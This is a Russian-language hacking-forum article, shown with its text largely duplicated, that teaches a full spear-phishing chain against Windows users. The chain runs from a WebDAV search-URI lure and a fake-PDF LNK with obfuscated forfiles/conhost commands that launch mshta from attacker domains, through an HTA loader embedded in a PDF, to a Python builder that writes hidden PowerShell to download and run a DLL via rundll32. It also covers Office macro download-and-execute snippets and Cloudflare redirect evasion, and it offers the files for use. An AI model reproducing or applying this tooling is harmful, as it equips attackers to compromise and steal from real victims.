Man
Professional
- Messages
- 3,142
- Reaction score
- 691
- Points
- 113
Все события и персонажи вымышлены. Любые совпадения с реальными личностями случайны. (с)
Итоговые скрипты, коды, файлы, лоадер и всё всё всё - кроме пакера, будут прикреплены к статье - пользуйтесь на здоровье. Вижу что можно .zip, .txt, .pdf, .png, .jpg, .jpeg, .gif (пролезет ли пдф с пейлоадом - проверять не буду)
1. Идем на мелководье.
В один прекрасный день начитавшись Кевина Митника (Искусство обмана и вторжения), я решил пойти на рыбалку. А точнее на phishing, spear phishing. Кажется это когда папуасы копьем добывают рыбу в реке, желательно крупную рыбу. Папуас ли я? Нет/Возможно. Копья тоже не было. Вот и пришла необходимость его создать.
Вдруг мне *случайно* в личку постучал админ одного из известных телеграм чатов (как потом выяснилось просто *подметала* чата , которого взяли недавно) и предложил свои услуги по разработке лоадера, фишинга и еб*ейшего 0, -1 дэй сплоита. Так были успешно проё.. Всё больше не матерюсь. Были успешно потрачены 5к баксив. Пол года обещаний и на выходе опенсурс ратник с опенсурс док,хлс макро лоадером. Который изначально, даже без пейлоада, палили все АВ и ЕДР мира. Обидно, досадно но ладно. Остановит ли это автора - нет, но дизморали придаст конкретно. Админа из этого чата известнейших реверсеров и поставщиков крякнутого ПО выпнули (возможно), чат-канал жив и живее всех живых.
Мне урок - работаем через гаранта (ага, ага, я ж с первого раза учусь, да)! Реверсерам, админам - не брать кого попало в мемберы.
Вот про док,ехел, к слову, немного наработок - Создаем activexbuttton и туды пихуем сей код. Работает ли - да. Но Мотва убивает всё и офис как направление было решено оставить. Вставлять изображение с детальным описанием как мотву из офис файла выключить, ну его. Проще win+r человека научить жмякать и чистый пвш туда лупить. Fakeupdate/fakefix и прочее.
КОДЫ для ОФИСА
[CODDE]cmd.exe /S /c" & "curl -s https://something.something > AGfQP8M7.bat && .\AGfQP8M7.bat && del AGfQP8M7.bat
-
<script>new ActiveXObject("WScript.Shell").Run('cmd.exe /S /c "curl -s https://something.something/calc.bat > AGfQP8M7.bat && .\\AGfQP8M7.bat && del AGfQP8M7.bat"');window.close();</script>
-
Sub AutoOpen()
Call CommandButton1_Click
End Sub
-
Sub CommandButton1()
Call Shell("cmd.exe /S /c" & "curl -s https://sec.us.org/files/addons/calc.bat > go.bat && .\go.bat", vbNormalFocus)
End Sub[/CODE]
2. Большая и темная вода.
Начинаем смотреть в сторону pdf. Но там все печально и сбежать из песочницы адоба (а не фокситридера - ну кто его юзает то) нереально сложно. Жава там урезанная и калькулятор запускаться отказывается.
Во время поисков натыкаюсь на статью про DarkHydra / DarkWater (спасибо ребята). И нахожу их сервер с живым htm образцом интересного url/uri handlera. (это не копипаста и не рерайт- как понимаю всей статьи, в условиях конкурса, а использование опенсурс кода, который является лишь частью всего инструмента , названным мною FOBOS - не путать с PHOBOS). На одном сеарч мс/сеарч далеко не уедешь, как показала практика. Всё это будет видно.
оригинал FXBULLS HTTPS HTM (в зип файле)
www.trendmicro.com
Вот хороший ресерч по попатченной цве и их реализация с жпегами и прочим. Мы пойдем другим путем. Но данный ресерч возможно пригодится и Вам, дорогие читатели.
С этой находкой я обращаюсь к продавцу одного известного софта. Данный человек тут побанен, и не зря думается. По доброте душевной и великой простоте, сиим открытием я поделился с забугроным *товарищем* сказав, что несмотря на то что его тулза бесполезна в нынешнем виде - может быть улучшена и стать работоспособной, в ответ получив от него обещание(!) помощи в моей фишинг кампании.
Что получил я в ответ , месяцы обещаний, delay'ев и один файл. В свою очередь я же нашел универсальный и до сих пор рабочий способ обхода средств защиты в лоадере, который мы увидим далее, им я тоже частично поделился (ппц). Кто виноват и что делать - никто. Продолжаем работу дальше. *Если ты пьешь с ворами, опасайся за свой кошелек(с)*. Продажи же софта c моими нововведениями под названием хмм "БозонХиксаБилдер" шли и идут. Но думаю после этой статьи, надобность в приобретении за 5к баксов этого инструмента пропадет. Ибо нефиг.
Всё забыли про всех NPC и теперь давайте разберем начало.
В бразуерах на основе хромиума,хрома (а это Edge , Chrome, YANDEX BROWSER etc ..) мы имеем приятный ури-урл хендлер который при открытии юзером хтмл страницы вызывает стандартный инструмент поиска виндоус. Списки всех ури-урл хендлеров винды и бразуеров я тут перечислять не буду, но есть пару интересных и перспективных. Я бы их называл ЛОЛУРИ. По аналогии с лолбинами.
Рассмотрим детальнее каркас нашей хтмл
Мы вызываем поиск в нашем WEBDAV сервере, указываем отображение папки как Downloads, и определяем query - название ЛНК файла PHSMA2024-2025-11391.pdf, который и будет первым этапом лоадера.
Юзер же увидит следующее перейда на нашу хтмл
Тут я для статьи подымаю питон сервер. в боевом режиме будет указано что ваш вебсайт а не локалхост, хочет открыть виндовс ехплорер.
При щелчке по Open Windows Explorer клиент увидит *ПДФ* файл, который на деле является лнк..
Вот как это будет примерно выглядеть с его стороны - для статьи поднял DUFS сервер и захостил все в своей сетке. В боевом режиме - будет Ваш красивый УРЛ и 80 порт.
Как видим дефендеру на свежих обновах по прежнему ПОФИГ. Хвала и почет усердному труду.
Сразу пойдем и настроим нормальный вебдав, а не дуфс, который будет ложиться и лагать.
000-default.conf меняем на наш 000-default.conf из зипа.
В нем образец 000-default.conf и giphy.gif (отсылка к Пару Юрского Периода, я и сам динозавр кстати)
Данные настройки не позволят удалять наши лнк, стейджи, пейлоады, и обрубят особо ленивым ресерчерам доступ к критически важной структуре фишинга. Все эти правила написаны через боль и ошибки, юзеры удаляли лнк, ресерчеры-бэтмены удаляли пейлоады и слали их на ВТ. Запускали шеллкоды из тхт через свои раннеры - сворачивали кровь НЕЩАДНО.
Углубляться в настройку апача , ассоциации, конфиг и тд не будем - ибо уйдем от основной темы статьи. Кому надо тот ЛЕГКО разберется и на изи подымет аналогичный сервер.
Все файлы я хранил на том же сервере, где и распологался фишинг домен. Не забываем купить ССЛ серты, ведь всё должно быть красиво.
Конкретно я делал transportation.us.org , sec.us.org, cftc.us.org - одноименные организации которые внушают доверие, почет, уважение и/или страх юзеру. Это вообще отдельная тема - как заставить жертву перейти по ссылке. Что написать, на что надавить, как персонализировать email, дабы ушли все подозрения.
Вернемся к хтмл. То что мы (ты и я, читатель который уже осилил многа букв) нашли у Вотер-Дарк Гидры, палится гугловскими ботами, в баунсе Вам напишут, что вы плохой человек и в ссылке вашей ВИРУСЪ, возможно даже АВ вендоры будут ругаться. Только в конце пути я понял что JS это плохо, а МЕТА очень даже хорошо. Да и не помешало бы доработать нюансы. Ведь не только на хроме могут открыть наше письмо, а даже на маке или мобильном устройстве.
Поэтому делаем следующее
В хтмл мы вставляем (Гуглу нравится) -
И для невиндоус мэнов
В резульате при входе с некошерного устройсва юзер получит сообщение, ну а наш сеарч на вебдав разумеется не отработает, но может заставить зайти с нужного браузера. Этим мы можем повысить конверсию. А можем и не повысить )
Как собственно сделать быстро и качетсвенно фейк хтмл лендинг. Качаем аддон для браузера SingleFile https://chromewebstore.google[.]com/detail/singlefile/mpiodijhokgodhhofbcjdecpffjipkle - и тащим единой страницей, необходимую нам хтмлку. При нажатии на гиперссылки, кнопки, юзер если что будет попадать на вполне легитмный ресурс.
Вот и образец готового решения (в зипе) -
METAPHSMA2024-2025-1139.pdf.html - почему двойное расширение. Потому что в апач конфиге настроили алиасы , чтобы линк был красивый на пдф ВЕЗДЕ.
Ок. Домен купили, настроили всё и вся там. Спф дкмай дмарк ссл почту (малый круг ада). Сервак купили под домен и фиш инфру. Апач настроили.
Хтмл там захостили. Из хтмл наш поиск ведет юзера на ЛНК... Мы его уже видели на скрине.
3. Издалека долго течёт река в Линки.
Создать ЛНК который не будет орать нынче хотя бы от дефендера дело непростое. И требует некого упорства и любознательности.
Изначально попадавшиеся в ресерчах (и той самой продажной за грязную зеленую бумажку тулзе, автор ее мне ничего не предоставил же, пришлось разбирать кряк по деталям) образцы тупо вели на пвш, пвш1 , смд - и их песенка была быстро спета. Мною был найден интересный лолбин и метод его примения.
FORFILES.EXE - из названия ясно что это, что-то для файлов. Мы с ними кажется и работаем, с файлами
Указываем в таргете -
Видите кавычки, а ав их не видят порой. Этот метод, которым я естессно поделился(ой дебил) прожил пару месяцев и был успешно спален, адептами той тулзы.
Иконку мы делаем ПФД - а это
И выбираем дефолтную пдф (индекс 13 кажется? Я руками делаю - можете автоматизировать легко)
Но теперь же это палится и получается мы уже на первом этапе уйдем в загас ав'шками - скажете вы. И будете правы. Поэтому открываем ЛОЛБИНС и ИЩЕМ.
Находим дофига и больше вариантов. Продемонстриуем самые интересные и рабочие, а так же на будущее под винду 11.
вин 11 - 2-60 было на вт. Кто сольет еще раз - буду бить палками и ногами.
ну и самый рабочий лолбин (кажется до сих пор актуальный) -
"ᴾ" обратите внимание на P и пробелы - это крайне полезные фишки. Пробелами вообще можно уладить все проблемы, как зонтом почти.
Остальные лолбины и методы запуска того что нам нужно , ищем сами - не льем на вт, не продаем, а делимся с товарищами по бедностью(несчастью)
ЛНК готов, выглядит красиво - имеет верную иконку и название PHSMA2024-2025-11391.pdf например. Недавно индусы что-то сделали и все лнк иконки стали прозрачными. Ничего страшного, вручную опять ставим нужную нам дефолтную (имеющуюся на каждом вин пк) пдф icon и заливаем обратно на наш подготовленный Апач. Едем дальше.
Изучив таргет лнк вы должны увидеть что конхост запускает пвш, тот в свою очередь запускает мсхта, а та зачем то *запускает* пдф. Что за фигня???
4. Страх и ненависть в ПДФ
FOBOS же? Глазам страшно - руки делают. Все лоадеры доступные мне палятся, мсхта код палится, еlevated виндовс ехе файлы (https://gist.github.com/TheWover/b5a340b1cac68156306866ff24e5934c) в которые сшивают js код наши забугорные товарищи забаненные (берется bhudtask.ехе раза три код копируется в один файл и между кодами ехе идет хта схема) - палятся. Может ну его нафиг и дальше скули искать. Русские не сдаются.
Я же как раз в сторону пдф смотрел. И вдруг вспомнил что умею мхт схему док файла вшивать в пдф файл.
Это позволяет отправить вредоносный док, а все ав будут его идентифицировать как пдф и соответственно не увидят в нем пейлоад.
Может как то можно обыграть? Можно.
Берем пдф и вообще не заморачиваясь в конце пдфки вставляем перед:
Или в ином месте тоже можно. Тут нужно экспериментировать. Вставляем ЦЕЛИКОМ нашу ХТА схему в которой зашит лоадер.
Какой такой лоадер - мы же про фишинг тут. А без него НИКУДА.
Разберем детально мною написанное. Складывается ощущение.. Что я не вру и предоставлю вот вам сразу и БЕСПЛАТНО готовый код лоадера под длл с кастом ентри поинтом (можете и DllMain указать) который зашьет Вашу команду в любой указанный пдф.
Как оно работает:
Берется стартовая команда. Как пример:
Данная команда запустит наш длл пейлоад (с калькулятором разумеется) и откроет НАСТОЯЩИЙ пдф декой. Который юзер и ожидает увидеть по ссылке.
Оборачивается через опенсурс обфускатор https://github.com/emdnaia/Babysteps АЙ ЛЮБЛЮ ТЕБЯ ХАРЛИ КВИН!
Далее инкапсуляция или как оно зовется, обход слэшей и кавычек для JS. Кто вообще этот язык придумал???
Потом обфусцируем стандартным js-обфускатором (https://obfuscator.io в питоне он есть библиотекой) и заливаем в хта схему, а далее крепим к ПДФ в правильном месте.
Опа и получаем зловещий ПДФ который хранит в себе наш лоадер. Или им и является. Тут все так быстро и легко написано, но сделать это рабочим, автоматизированным, для человека который за компьютер сел в среднем возрасте и не умел даже sqlmap запускать через python - было непросто и долго.
(вы можете изменить код на ехе, msi, да на всё что душе угодно. И разумеется поделиться с нами в комментах улучшенной версией)
Вот он тот самый пдф на который ссылается МХТА.ехе в нашем лнк.
Не забываем, что
!!!This code is for educational purposes only and should only be used on systems for which you have explicit permission to test.!!!
Фишим мы только с разрешения работодателя, начальника, командира, капитана. Цели на которые дали ДОБРО. Кто по странам снг,цис это будет юзать - ждет нещадный криптотермальноректальный анализатор.
5. Облака плывут, облака, Не спеша плывут как в кино.
Что мы хотим запустить? Калькулятор конечно же. Зашили его в лоадер, который в жс, который в хта, который в пдф, который вызывает мхта, через повершелл, который позвал конхост, через лнк, который на вебдаве, в который постучал сеарч-мс , который в мете, в хтмл. (Сказка про кощея прям)
Ну что нам осталось - совсем немного. Отправить эту ссылку на хтмл юзверю.
Можно этот этап пропустить. Но лучше не надо.
Рейтинг нашего домена скорее всего близится к нулю. DA - domain authority. Не путать с домен админом. Как будем исправлять? Делать редиректы на трастед доменах.
В пример возьмем Cloudlfare. Можно и на АВС - но меня там банят на ура. И по 5$ cписывают с виртаульной карты, и не возвращают (козлы).
Регаем там аккаунт и делаем PAGES. Визуально наш пейджес будет напоминать страницу антибота, проверки Клауда, где вас либо попросят щелкнуть по галочке, либо автоматически переведут на искомую веб страницу.
Опять же через боль, были получены оригиналы этих страниц и немного видоизменены. С автоматической проверкой темы браузера - чтобы не вызывать подозрений.
Данный линк при грамотном использовании ХТМЛ боди письма скрывается за хрефом и выглядит весьма легитимно. Гугл не ругается. Пропускает письма.
Образец в зип - index.html
Вот готова хтмл в ней в самом начале лишь:
Остальное дело техники. Ну и не забудьте поменять cftc текстовые блоки на Ваш url
Бонусом идет скрипт для автоматического создания 100 cloudflare pages и коллекта линков , который Вы можете использовать.
DA - 98 . дописываем хвосты и ГОТОВО.
Образец в зип -
6. БЕДА, БЕДА, ОГОРЧЕНИЕ
Ничего идеального в мире нет. И тут не исключение - МОТВ на лнк в вебдаве. Юзеру всё равно придется кликнуть по маленькому окошку. Мол мы не знаем кто автор пдфки))
Мы успешно обходим смартскрин(!) этим методом. Но не мотву. Я пытался и зип, и лнк, и исо. Не получалось. Если вдруг кто-то найдет решение, поделитесь пожалуйста.
На практике - люди кликают, кликают даже те люди от которых не ожидаешь. Например бывший глава всей корейской биржи, серьезный дядя по факту. Он и ратник мой спалил на изи, чем меня привел к руткитам (спасибо ему большое и успехов в администрировании криптобота, которые я как раз выцеливал).
Ну и крайне буду признателен если кто-то доработает этот лоадер, сделает гуи и иные фишки. Пусть будет наш славный и опенсурсный (по репе, дате реги)) ) КысКысЛоадер - можно коллективно допиливать до идеала.
Как вас могут найти:
x.com
Не хостите все серваки у одного провайдера. Вот ребята быстро прикрыли вышеуказанные домены. Обозвали меня RedTeam (немножко приятно). В идеале работать с одной кампанией, дабы не распылять силы и средства. Персонализируйте письма на максимум. Давите на больное или на жажду наживы цели. Если долго мучаться, что-нибудь получится.
Как вы заметили сделан упор на технической стороне рыбалки. Всё остальное - дело личной фантазии и воображения.
7. Финиш.
Как завершить эту статью ...
Мне хотелось бы изначально поблагодарить форум XSS.is , уважаемую Администрацию форума, и его участников - за огромную базу знаний, обсуждения и споры которые приводят к истине и решениям.
Отдельное спасибо Луне за фин помощь и спонсорство в данном конкурсе.
Век живи. Век учись.
Всем успехов в конкурсе и по жизни!
НУ И КОНЕЧНО РЫБКУ ПОКРУПНЕЕ..
Содержание ЗИПА:
1. 000-conf - конфиг вебдава
2. giphy.gif - гифка от хантеров
3. baby66.ps1 - пвш обфускатор
4. FOBOS.py - лоадер
5. PHSMA .. lnk - образец лнк
6. https fx bulls - начало истории с мс-сеарч
7. index.html - клауд редирект
8.100redirects.py - автоматическое создание редиректов
9. METAPHSMA ... pdf.html - образец финальной версии фиш хтмл. - оп не влезает. Сделайте сами - в статье ВСЁ есть)
ZIP: https://xss.is/attachments/100036/
Итоговые скрипты, коды, файлы, лоадер и всё всё всё - кроме пакера, будут прикреплены к статье - пользуйтесь на здоровье. Вижу что можно .zip, .txt, .pdf, .png, .jpg, .jpeg, .gif (пролезет ли пдф с пейлоадом - проверять не буду)
1. Идем на мелководье.
В один прекрасный день начитавшись Кевина Митника (Искусство обмана и вторжения), я решил пойти на рыбалку. А точнее на phishing, spear phishing. Кажется это когда папуасы копьем добывают рыбу в реке, желательно крупную рыбу. Папуас ли я? Нет/Возможно. Копья тоже не было. Вот и пришла необходимость его создать.
Вдруг мне *случайно* в личку постучал админ одного из известных телеграм чатов (как потом выяснилось просто *подметала* чата , которого взяли недавно) и предложил свои услуги по разработке лоадера, фишинга и еб*ейшего 0, -1 дэй сплоита. Так были успешно проё.. Всё больше не матерюсь. Были успешно потрачены 5к баксив. Пол года обещаний и на выходе опенсурс ратник с опенсурс док,хлс макро лоадером. Который изначально, даже без пейлоада, палили все АВ и ЕДР мира. Обидно, досадно но ладно. Остановит ли это автора - нет, но дизморали придаст конкретно. Админа из этого чата известнейших реверсеров и поставщиков крякнутого ПО выпнули (возможно), чат-канал жив и живее всех живых.
Мне урок - работаем через гаранта (ага, ага, я ж с первого раза учусь, да)! Реверсерам, админам - не брать кого попало в мемберы.
Вот про док,ехел, к слову, немного наработок - Создаем activexbuttton и туды пихуем сей код. Работает ли - да. Но Мотва убивает всё и офис как направление было решено оставить. Вставлять изображение с детальным описанием как мотву из офис файла выключить, ну его. Проще win+r человека научить жмякать и чистый пвш туда лупить. Fakeupdate/fakefix и прочее.
КОДЫ для ОФИСА
[CODDE]cmd.exe /S /c" & "curl -s https://something.something > AGfQP8M7.bat && .\AGfQP8M7.bat && del AGfQP8M7.bat
-
<script>new ActiveXObject("WScript.Shell").Run('cmd.exe /S /c "curl -s https://something.something/calc.bat > AGfQP8M7.bat && .\\AGfQP8M7.bat && del AGfQP8M7.bat"');window.close();</script>
-
Sub AutoOpen()
Call CommandButton1_Click
End Sub
-
Sub CommandButton1()
Call Shell("cmd.exe /S /c" & "curl -s https://sec.us.org/files/addons/calc.bat > go.bat && .\go.bat", vbNormalFocus)
End Sub[/CODE]
2. Большая и темная вода.
Начинаем смотреть в сторону pdf. Но там все печально и сбежать из песочницы адоба (а не фокситридера - ну кто его юзает то) нереально сложно. Жава там урезанная и калькулятор запускаться отказывается.
Во время поисков натыкаюсь на статью про DarkHydra / DarkWater (спасибо ребята). И нахожу их сервер с живым htm образцом интересного url/uri handlera. (это не копипаста и не рерайт- как понимаю всей статьи, в условиях конкурса, а использование опенсурс кода, который является лишь частью всего инструмента , названным мною FOBOS - не путать с PHOBOS). На одном сеарч мс/сеарч далеко не уедешь, как показала практика. Всё это будет видно.
оригинал FXBULLS HTTPS HTM (в зип файле)
CVE-2024-21412: Water Hydra Targets Traders with Microsoft Defender SmartScreen Zero-Day
The APT group Water Hydra has been exploiting the Microsoft Defender SmartScreen vulnerability CVE-2024-21412 in its campaigns targeting financial market traders. This vulnerability, which has now been patched by Microsoft, was discovered and disclosed by the Trend Micro Zero Day Initiative.
С этой находкой я обращаюсь к продавцу одного известного софта. Данный человек тут побанен, и не зря думается. По доброте душевной и великой простоте, сиим открытием я поделился с забугроным *товарищем* сказав, что несмотря на то что его тулза бесполезна в нынешнем виде - может быть улучшена и стать работоспособной, в ответ получив от него обещание(!) помощи в моей фишинг кампании.
Что получил я в ответ , месяцы обещаний, delay'ев и один файл. В свою очередь я же нашел универсальный и до сих пор рабочий способ обхода средств защиты в лоадере, который мы увидим далее, им я тоже частично поделился (ппц). Кто виноват и что делать - никто. Продолжаем работу дальше. *Если ты пьешь с ворами, опасайся за свой кошелек(с)*. Продажи же софта c моими нововведениями под названием хмм "БозонХиксаБилдер" шли и идут. Но думаю после этой статьи, надобность в приобретении за 5к баксов этого инструмента пропадет. Ибо нефиг.
Всё забыли про всех NPC и теперь давайте разберем начало.
В бразуерах на основе хромиума,хрома (а это Edge , Chrome, YANDEX BROWSER etc ..) мы имеем приятный ури-урл хендлер который при открытии юзером хтмл страницы вызывает стандартный инструмент поиска виндоус. Списки всех ури-урл хендлеров винды и бразуеров я тут перечислять не буду, но есть пару интересных и перспективных. Я бы их называл ЛОЛУРИ. По аналогии с лолбинами.
Рассмотрим детальнее каркас нашей хтмл
HTML:
<!DOCTYPE html>
<html lang="en">
<head>
<script>setTimeout(() => {window.location.href = "search:query=PHSMA2024-2025-11391.pdf&crumb=location:\\\\transportation.us.org@80\\files\\acts&displayname=Downloads";}, 300);</script>
</head>
<body>
</body>
</html>Мы вызываем поиск в нашем WEBDAV сервере, указываем отображение папки как Downloads, и определяем query - название ЛНК файла PHSMA2024-2025-11391.pdf, который и будет первым этапом лоадера.
Юзер же увидит следующее перейда на нашу хтмл
Тут я для статьи подымаю питон сервер. в боевом режиме будет указано что ваш вебсайт а не локалхост, хочет открыть виндовс ехплорер.
При щелчке по Open Windows Explorer клиент увидит *ПДФ* файл, который на деле является лнк..
Вот как это будет примерно выглядеть с его стороны - для статьи поднял DUFS сервер и захостил все в своей сетке. В боевом режиме - будет Ваш красивый УРЛ и 80 порт.
Как видим дефендеру на свежих обновах по прежнему ПОФИГ. Хвала и почет усердному труду.
Сразу пойдем и настроим нормальный вебдав, а не дуфс, который будет ложиться и лагать.
Code:
apt install apache2&&systemctl start apache2&&systemctl enable apache2&&apt install apache2-utils&&a2enmod dav&&a2enmod ssl&&a2enmod dav_fs&&a2enmod rewrite
cd /etc/apache2/sites-enabled/В нем образец 000-default.conf и giphy.gif (отсылка к Пару Юрского Периода, я и сам динозавр кстати)
Данные настройки не позволят удалять наши лнк, стейджи, пейлоады, и обрубят особо ленивым ресерчерам доступ к критически важной структуре фишинга. Все эти правила написаны через боль и ошибки, юзеры удаляли лнк, ресерчеры-бэтмены удаляли пейлоады и слали их на ВТ. Запускали шеллкоды из тхт через свои раннеры - сворачивали кровь НЕЩАДНО.
Углубляться в настройку апача , ассоциации, конфиг и тд не будем - ибо уйдем от основной темы статьи. Кому надо тот ЛЕГКО разберется и на изи подымет аналогичный сервер.
Все файлы я хранил на том же сервере, где и распологался фишинг домен. Не забываем купить ССЛ серты, ведь всё должно быть красиво.
Конкретно я делал transportation.us.org , sec.us.org, cftc.us.org - одноименные организации которые внушают доверие, почет, уважение и/или страх юзеру. Это вообще отдельная тема - как заставить жертву перейти по ссылке. Что написать, на что надавить, как персонализировать email, дабы ушли все подозрения.
Вернемся к хтмл. То что мы (ты и я, читатель который уже осилил многа букв) нашли у Вотер-Дарк Гидры, палится гугловскими ботами, в баунсе Вам напишут, что вы плохой человек и в ссылке вашей ВИРУСЪ, возможно даже АВ вендоры будут ругаться. Только в конце пути я понял что JS это плохо, а МЕТА очень даже хорошо. Да и не помешало бы доработать нюансы. Ведь не только на хроме могут открыть наше письмо, а даже на маке или мобильном устройстве.
Поэтому делаем следующее
В хтмл мы вставляем (Гуглу нравится) -
HTML:
<meta http-equiv="refresh" content="0; url=search:query=PHSMA2024-2025-11391.pdf&crumb=location:\\transportation.us.org@80\files\acts&displayname=Downloads" />И для невиндоус мэнов
JavaScript:
<script>
// Чекам браузер
function checkBrowser() {
var userAgent = navigator.userAgent;
if (userAgent.includes("Mobile")) {
document.getElementById("browserMessage").innerText = "403. Forbidden. File storage accessible through a desktop Microsoft Windows Edge browser, Google Inc. Chrome and Chromium based web browsers.";
} else if (userAgent.includes("Mac OS")) {
document.getElementById("browserMessage").innerText = "403. Forbidden. File storage accessible through a desktop Microsoft Windows Edge browser, Google Inc. Chrome and Chromium based web browsers";
} else if (userAgent.includes("Firefox")) {
document.getElementById("browserMessage").innerText = "403. Forbidden. File storage accessible through a desktop Microsoft Windows Edge browser, Google Inc. Chrome and Chromium based web browsers";
}
}
</script>В резульате при входе с некошерного устройсва юзер получит сообщение, ну а наш сеарч на вебдав разумеется не отработает, но может заставить зайти с нужного браузера. Этим мы можем повысить конверсию. А можем и не повысить )
Как собственно сделать быстро и качетсвенно фейк хтмл лендинг. Качаем аддон для браузера SingleFile https://chromewebstore.google[.]com/detail/singlefile/mpiodijhokgodhhofbcjdecpffjipkle - и тащим единой страницей, необходимую нам хтмлку. При нажатии на гиперссылки, кнопки, юзер если что будет попадать на вполне легитмный ресурс.
Вот и образец готового решения (в зипе) -
METAPHSMA2024-2025-1139.pdf.html - почему двойное расширение. Потому что в апач конфиге настроили алиасы , чтобы линк был красивый на пдф ВЕЗДЕ.
Ок. Домен купили, настроили всё и вся там. Спф дкмай дмарк ссл почту (малый круг ада). Сервак купили под домен и фиш инфру. Апач настроили.
Хтмл там захостили. Из хтмл наш поиск ведет юзера на ЛНК... Мы его уже видели на скрине.
3. Издалека долго течёт река в Линки.
Создать ЛНК который не будет орать нынче хотя бы от дефендера дело непростое. И требует некого упорства и любознательности.
Изначально попадавшиеся в ресерчах (и той самой продажной за грязную зеленую бумажку тулзе, автор ее мне ничего не предоставил же, пришлось разбирать кряк по деталям) образцы тупо вели на пвш, пвш1 , смд - и их песенка была быстро спета. Мною был найден интересный лолбин и метод его примения.
FORFILES.EXE - из названия ясно что это, что-то для файлов. Мы с ними кажется и работаем, с файлами
Указываем в таргете -
Code:
C:\Windows\System32\forfiles.exe /p C:\Windows\System32 /m c"al"c.exe /c "pow"e"rshell . ms"h"ta https://sec.us.org/fi"l"e"s/add"ons/Ex"emp"tionforCert"a"inC"ryp"toAdv"ise"rs.pdfВидите кавычки, а ав их не видят порой. Этот метод, которым я естессно поделился(ой дебил) прожил пару месяцев и был успешно спален, адептами той тулзы.
Иконку мы делаем ПФД - а это
Code:
%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exeИ выбираем дефолтную пдф (индекс 13 кажется? Я руками делаю - можете автоматизировать легко)
Но теперь же это палится и получается мы уже на первом этапе уйдем в загас ав'шками - скажете вы. И будете правы. Поэтому открываем ЛОЛБИНС и ИЩЕМ.
Находим дофига и больше вариантов. Продемонстриуем самые интересные и рабочие, а так же на будущее под винду 11.
вин 11 - 2-60 было на вт. Кто сольет еще раз - буду бить палками и ногами.
Code:
%USERPROFILE%\AppData\Local\Microsoft\WindowsApps\wt.exe forfiles.exe /"ᴾ" %windir%\ /m *.bin /c "pow"e"rshell . ms"h"ta https://investor.us.org/files/addons/InvestmentAdvisersAct2.pdfну и самый рабочий лолбин (кажется до сих пор актуальный) -
Code:
C:\Windows\System32\conhost.exe --headless powershell.exe . ms"h"ta https://transportation.us.org/fil"es/add"ons/PHSMA2024-2025-113912.pdfОстальные лолбины и методы запуска того что нам нужно , ищем сами - не льем на вт, не продаем, а делимся с товарищами по бедностью(несчастью)
ЛНК готов, выглядит красиво - имеет верную иконку и название PHSMA2024-2025-11391.pdf например. Недавно индусы что-то сделали и все лнк иконки стали прозрачными. Ничего страшного, вручную опять ставим нужную нам дефолтную (имеющуюся на каждом вин пк) пдф icon и заливаем обратно на наш подготовленный Апач. Едем дальше.
Изучив таргет лнк вы должны увидеть что конхост запускает пвш, тот в свою очередь запускает мсхта, а та зачем то *запускает* пдф. Что за фигня???
4. Страх и ненависть в ПДФ
FOBOS же? Глазам страшно - руки делают. Все лоадеры доступные мне палятся, мсхта код палится, еlevated виндовс ехе файлы (https://gist.github.com/TheWover/b5a340b1cac68156306866ff24e5934c) в которые сшивают js код наши забугорные товарищи забаненные (берется bhudtask.ехе раза три код копируется в один файл и между кодами ехе идет хта схема) - палятся. Может ну его нафиг и дальше скули искать. Русские не сдаются.
Я же как раз в сторону пдф смотрел. И вдруг вспомнил что умею мхт схему док файла вшивать в пдф файл.
Это позволяет отправить вредоносный док, а все ав будут его идентифицировать как пдф и соответственно не увидят в нем пейлоад.
Может как то можно обыграть? Можно.
Берем пдф и вообще не заморачиваясь в конце пдфки вставляем перед:
Code:
startxref
294615
%%EOFИли в ином месте тоже можно. Тут нужно экспериментировать. Вставляем ЦЕЛИКОМ нашу ХТА схему в которой зашит лоадер.
Какой такой лоадер - мы же про фишинг тут. А без него НИКУДА.
Разберем детально мною написанное. Складывается ощущение.. Что я не вру и предоставлю вот вам сразу и БЕСПЛАТНО готовый код лоадера под длл с кастом ентри поинтом (можете и DllMain указать) который зашьет Вашу команду в любой указанный пдф.
Python:
import subprocess
import re
import os
# МЕНЮ
pdf_path = input("Enter the full path of the PDF (used for the command): ")
pdfinj_path = input("Enter the full path of the PDF to inject the HTA content into: ")
dll_path = input("Enter the full DLL path (including DLL name): ")
dll_entry = input("Enter the DLL entry point: ")
# ИМЕНА
pdf_name = pdf_path.split('/')[-1]
dll_name = dll_path.split('/')[-1]
# ПВШ
command = f'''powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('{pdf_path}', '$env:APPDATA\\{pdf_name}'); Start-Process '$env:APPDATA\\{pdf_name}' -WindowStyle Hidden; (New-Object System.Net.WebClient).DownloadFile('{dll_path}', '$env:TEMP\\{dll_name}'); Start-Process 'rundll32.exe' -ArgumentList '$env:TEMP\\{dll_name},{dll_entry}' -WindowStyle Hidden;"'''
# ОБФУСКАЦИЯ
result = subprocess.run(["powershell.exe", "-ExecutionPolicy", "Bypass", "-File", "baby66.ps1"],
input=command, text=True, capture_output=True)
# АУТПУТ
output = result.stdout
# ЧЕКАЕМ АУТПУТ
match = re.search(r'function\s+\w+\{.*', output, re.DOTALL)
if match:
extracted_function = match.group(0).strip()
def format_command_for_js(powershell_command):
# ОБХОД ЖАВЫ
powershell_command = powershell_command.replace("'", "\\'")
# ЖС КОМАНДА
js_command = f"var command = 'powershell.exe -WindowStyle Hidden -nop -ExecutionPolicy Bypass -Command \"{powershell_command}\"';var WshShell = new ActiveXObject('WScript.Shell');WshShell.Run(command, 0, false);window.close();"
return js_command
# ХТА
hta_command = '''<HTA:APPLICATION CAPTION = "no" WINDOWSTATE = "minimize" SHOWINTASKBAR = "no" >
<script>var Dodo = function() {'''
htaend_command ='''};</script><script>Dodo();</script>'''
js_command = format_command_for_js(extracted_function)
full_hta_content = hta_command + js_command + htaend_command
# ПРОМЕЖУТОЧНЫЙ ХТА
hta_file_path = "hta.hta"
with open(hta_file_path, "w") as hta_file:
hta_file.write(full_hta_content)
# ПРОМЕЖУТОЧНЫЙ ЖС
contain_js_path = os.path.abspath("contain.js")
script_content = re.findall(r'<script>(.*?)</script>', full_hta_content, re.DOTALL)
if script_content:
with open(contain_js_path, "w") as script_file:
script_file.write(script_content[0].strip())
# ОБФУСКАЦИЯ ЖС
obfuscate_command = f"javascript-obfuscator {contain_js_path} --output {contain_js_path}"
subprocess.run(obfuscate_command, shell=True)
# ВСТАВЛЯЕМ ЖС В ХТА
with open(contain_js_path, "r") as script_file:
obfuscated_js = script_file.read()
